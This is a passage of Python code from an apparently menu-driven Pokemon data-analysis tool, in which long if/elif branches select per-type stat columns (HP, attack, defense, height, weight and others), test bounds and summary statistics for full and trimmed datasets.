stat_values = loaddata.rock_types['attack']
stat_stats = loaddata.rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['defense']
stat_stats = loaddata.rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['sp_attack']
stat_stats = loaddata.rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['sp_defense']
stat_stats = loaddata.rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.rock_types['height_m']
stat_stats = loaddata.rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.rock_types['weight_kg']
stat_stats = loaddata.rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.bug_types['total_points']
stat_stats = loaddata.bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['hp']
stat_stats = loaddata.bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['speed']
stat_stats = loaddata.bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['attack']
stat_stats = loaddata.bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['defense']
stat_stats = loaddata.bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['sp_attack']
stat_stats = loaddata.bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['sp_defense']
stat_stats = loaddata.bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.bug_types['height_m']
stat_stats = loaddata.bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.bug_types['weight_kg']
stat_stats = loaddata.bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ghost_types['total_points']
stat_stats = loaddata.ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['hp']
stat_stats = loaddata.ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['speed']
stat_stats = loaddata.ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['attack']
stat_stats = loaddata.ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['defense']
stat_stats = loaddata.ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['sp_attack']
stat_stats = loaddata.ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['sp_defense']
stat_stats = loaddata.ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ghost_types['height_m']
stat_stats = loaddata.ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.ghost_types['weight_kg']
stat_stats = loaddata.ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.steel_types['total_points']
stat_stats = loaddata.steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['hp']
stat_stats = loaddata.steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['speed']
stat_stats = loaddata.steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['attack']
stat_stats = loaddata.steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['defense']
stat_stats = loaddata.steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['sp_attack']
stat_stats = loaddata.steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['sp_defense']
stat_stats = loaddata.steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.steel_types['height_m']
stat_stats = loaddata.steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.steel_types['weight_kg']
stat_stats = loaddata.steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon
elif type_set == "19":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.total_points
stat_stats = loaddata.total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.hp
stat_stats = loaddata.hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.speed
stat_stats = loaddata.speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.attack
stat_stats = loaddata.attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.defense
stat_stats = loaddata.defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.sp_attack
stat_stats = loaddata.sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.sp_defense
stat_stats = loaddata.sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.heights
stat_stats = loaddata.height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.weight
stat_stats = loaddata.weight_stats
unit = '(kg)'
else:
return
else:
return
elif data_set == "2": # trimmed pokemon
set_name = "Pokemon"
modifier = '(trimmed)'
# grass pokemon
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_grass_types['total_points']
stat_stats = loaddata.trimmed_grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['hp']
stat_stats = loaddata.trimmed_grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['speed']
stat_stats = loaddata.trimmed_grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['attack']
stat_stats = loaddata.trimmed_grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['defense']
stat_stats = loaddata.trimmed_grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['sp_attack']
stat_stats = loaddata.trimmed_grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['sp_defense']
stat_stats = loaddata.trimmed_grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_grass_types['height_m']
stat_stats = loaddata.trimmed_grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_grass_types['weight_kg']
stat_stats = loaddata.trimmed_grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_fire_types['total_points']
stat_stats = loaddata.trimmed_fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['hp']
stat_stats = loaddata.trimmed_fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['speed']
stat_stats = loaddata.trimmed_fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['attack']
stat_stats = loaddata.trimmed_fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['defense']
stat_stats = loaddata.trimmed_fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['sp_attack']
stat_stats = loaddata.trimmed_fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['sp_defense']
stat_stats = loaddata.trimmed_fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_fire_types['height_m']
stat_stats = loaddata.trimmed_fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_fire_types['weight_kg']
stat_stats = loaddata.trimmed_fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_water_types['total_points']
stat_stats = loaddata.trimmed_water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['hp']
stat_stats = loaddata.trimmed_water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['speed']
stat_stats = loaddata.trimmed_water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['attack']
stat_stats = loaddata.trimmed_water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['defense']
stat_stats = loaddata.trimmed_water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['sp_attack']
stat_stats = loaddata.trimmed_water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['sp_defense']
stat_stats = loaddata.trimmed_water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_water_types['height_m']
stat_stats = loaddata.trimmed_water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_water_types['weight_kg']
stat_stats = loaddata.trimmed_water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_electric_types['total_points']
stat_stats = loaddata.trimmed_electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['hp']
stat_stats = loaddata.trimmed_electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['speed']
stat_stats = loaddata.trimmed_electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['attack']
stat_stats = loaddata.trimmed_electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['defense']
stat_stats = loaddata.trimmed_electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['sp_attack']
stat_stats = loaddata.trimmed_electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['sp_defense']
stat_stats = loaddata.trimmed_electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_electric_types['height_m']
stat_stats = loaddata.trimmed_electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_electric_types['weight_kg']
stat_stats = loaddata.trimmed_electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_psychic_types['total_points']
stat_stats = loaddata.trimmed_psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['hp']
stat_stats = loaddata.trimmed_psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['speed']
stat_stats = loaddata.trimmed_psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['attack']
stat_stats = loaddata.trimmed_psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['defense']
stat_stats = loaddata.trimmed_psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['sp_attack']
stat_stats = loaddata.trimmed_psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['sp_defense']
stat_stats = loaddata.trimmed_psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_psychic_types['height_m']
stat_stats = loaddata.trimmed_psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_psychic_types['weight_kg']
stat_stats = loaddata.trimmed_psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_ice_types['total_points']
stat_stats = loaddata.trimmed_ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['hp']
stat_stats = loaddata.trimmed_ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['speed']
stat_stats = loaddata.trimmed_ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['attack']
stat_stats = loaddata.trimmed_ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['defense']
stat_stats = loaddata.trimmed_ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['sp_attack']
stat_stats = loaddata.trimmed_ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['sp_defense']
stat_stats = loaddata.trimmed_ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_ice_types['height_m']
stat_stats = loaddata.trimmed_ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_ice_types['weight_kg']
stat_stats = loaddata.trimmed_ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_dragon_types['total_points']
stat_stats = loaddata.trimmed_dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['hp']
stat_stats = loaddata.trimmed_dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['speed']
stat_stats = loaddata.trimmed_dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['attack']
stat_stats = loaddata.trimmed_dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['defense']
stat_stats = loaddata.trimmed_dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['sp_attack']
stat_stats = loaddata.trimmed_dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['sp_defense']
stat_stats = loaddata.trimmed_dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_dragon_types['height_m']
stat_stats = loaddata.trimmed_dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_dragon_types['weight_kg']
stat_stats = loaddata.trimmed_dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_dark_types['total_points']
stat_stats = loaddata.trimmed_dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['hp']
stat_stats = loaddata.trimmed_dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['speed']
stat_stats = loaddata.trimmed_dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['attack']
stat_stats = loaddata.trimmed_dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['defense']
stat_stats = loaddata.trimmed_dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['sp_attack']
stat_stats = loaddata.trimmed_dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['sp_defense']
stat_stats = loaddata.trimmed_dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_dark_types['height_m']
stat_stats = loaddata.trimmed_dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_dark_types['weight_kg']
stat_stats = loaddata.trimmed_dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_fairy_types['total_points']
stat_stats = loaddata.trimmed_fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['hp']
stat_stats = loaddata.trimmed_fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['speed']
stat_stats = loaddata.trimmed_fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['attack']
stat_stats = loaddata.trimmed_fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['defense']
stat_stats = loaddata.trimmed_fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['sp_attack']
stat_stats = loaddata.trimmed_fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['sp_defense']
stat_stats = loaddata.trimmed_fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_fairy_types['height_m']
stat_stats = loaddata.trimmed_fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_fairy_types['weight_kg']
stat_stats = loaddata.trimmed_fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_normal_types['total_points']
stat_stats = loaddata.trimmed_normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['hp']
stat_stats = loaddata.trimmed_normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['speed']
stat_stats = loaddata.trimmed_normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['attack']
stat_stats = loaddata.trimmed_normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['defense']
stat_stats = loaddata.trimmed_normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['sp_attack']
stat_stats = loaddata.trimmed_normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['sp_defense']
stat_stats = loaddata.trimmed_normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_normal_types['height_m']
stat_stats = loaddata.trimmed_normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_normal_types['weight_kg']
stat_stats = loaddata.trimmed_normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_fighting_types['total_points']
stat_stats = loaddata.trimmed_fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['hp']
stat_stats = loaddata.trimmed_fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['speed']
stat_stats = loaddata.trimmed_fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['attack']
stat_stats = loaddata.trimmed_fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['defense']
stat_stats = loaddata.trimmed_fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['sp_attack']
stat_stats = loaddata.trimmed_fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['sp_defense']
stat_stats = loaddata.trimmed_fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_fighting_types['height_m']
stat_stats = loaddata.trimmed_fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_fighting_types['weight_kg']
stat_stats = loaddata.trimmed_fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_flying_types['total_points']
stat_stats = loaddata.trimmed_flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['hp']
stat_stats = loaddata.trimmed_flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['speed']
stat_stats = loaddata.trimmed_flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['attack']
stat_stats = loaddata.trimmed_flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['defense']
stat_stats = loaddata.trimmed_flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['sp_attack']
stat_stats = loaddata.trimmed_flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['sp_defense']
